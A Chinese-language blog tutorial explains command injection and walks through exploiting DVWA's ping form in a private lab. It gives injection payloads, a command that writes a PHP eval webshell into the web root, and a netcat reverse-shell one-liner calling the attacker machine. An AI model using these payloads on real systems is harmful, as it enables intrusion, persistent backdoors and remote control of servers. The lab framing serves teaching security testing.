安全漏洞從原理到實戰--命令執行漏洞

01 命令執行漏洞
即黑客可以通過控制參數執行系統命令,形成原因是開發人員對用戶輸入參數安全檢查不足從而導致的惡意命令執行。

02 常見的系統命令執行函數
Php命令執行函數eval()函數、assert()、preg_replace()、call_user_func()等。Java命令執行函數exec()函數等。

03 實戰

  目標

        Ubuntu16.04

        DVWA系統

        IP:192.168.1.5

   攻擊

       Kali Linux2020.2

       IP:192.168.1.10
   a、功能分析
       提示信息輸入IP地址

在這裏插入圖片描述
輸入IP地址,通過頁面返回信息得知該功能是執行ping命令
在這裏插入圖片描述
b、漏洞分析
可能存在命令注入漏洞,構造參數如127.0.0.1|whoami
在這裏插入圖片描述
發現返回www-data、說明存在命令執行漏洞,且系統應該是Linux系統。使用127.0.0.1|uname驗證系統。
在這裏插入圖片描述
返回系統是Linux系統,如果不返回任何信息說明是Windows系統。
&:除了最後一個cmd,前面的cmd均已後臺方式靜默執行,執行結果顯示在終端上,個別的cmd錯誤不影響整個命令的執行,全部的cmd同時執行。
**&&:**從左到右順序執行cmd,個別cmd錯誤不產生影響。
**|:**各個cmd同時在前臺被執行,但是除最後的cmd之外,其餘的執行結果不會被顯示在終端上。
**||:**從左到右順序執行cmd,只有左側的cmd執行出錯,右邊的cmd纔會被執行,同時一旦有cmd被成功執行,整個命令就會結束,返回終端。
漏洞利用
1、寫入webshell
查看文件

127.0.0.1|ls /var/www/html/dvwa

在這裏插入圖片描述

127.0.0.1|echo "<?php @eval($_POST['123456'];?>">/var/ww/html/dvwa/1.php

在這裏插入圖片描述
寫入成功
2、反彈shell

127.0.0.1|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.10 4444 >/tmp/f

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章